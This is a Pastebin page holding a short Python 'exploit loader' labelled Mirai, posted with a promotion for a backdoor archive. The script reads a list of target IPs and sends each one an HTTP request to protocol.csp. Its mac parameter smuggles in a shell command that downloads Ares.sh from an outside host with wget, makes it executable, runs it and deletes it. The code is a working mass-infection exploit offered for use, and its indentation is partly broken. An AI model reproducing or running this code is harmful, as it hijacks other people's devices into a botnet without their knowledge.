Advertisement
xB4ckdoorREAL

[HOOTO EXPLOIT LOADER] [MIRAI]

Nov 2nd, 2019
529
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.02 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. #DOWNLOADED BY B4CKDOORARCHIVE.HOST | 4 PRIVATE STUFF PM ME. https://discord.gg/MVktpTW
  4.  
  5. import threading
  6. import sys
  7. import time
  8. import random
  9. import socket
  10. import subprocess
  11. import re
  12. import os
  13. import struct
  14. import array
  15. import requests
  16. from threading import Thread
  17. from time import sleep
  18. from requests.auth import HTTPDigestAuth
  19. from decimal import *  
  20.  
  21. ips = open(sys.argv[1], "r").readlines()
  22.  
  23. def run(cmd):
  24.     subprocess.call(cmd, shell=True)   
  25. class tripmate(threading.Thread):
  26.         def __init__ (self, ip):
  27.             threading.Thread.__init__(self)
  28.             self.ip = str(ip).rstrip('\n')
  29.         def run(self):
  30.             try:
  31.                 print "--> " + self.ip
  32.  
  33. url = "http://" + self.ip + "/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://b4.ck.do.or/Ares.sh; chmod 777 Ares.sh; sh Ares.sh; rm -rf Ares.sh"
  34.  
  35.                 requests.get(url, timeout=3)
  36.  
  37.             except Exception as e:
  38.                 pass
  39. for ip in ips:
  40.     try:
  41.         r = tripmate(ip)
  42.         r.start()
  43.         time.sleep(0.03)
  44.     except:
  45.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement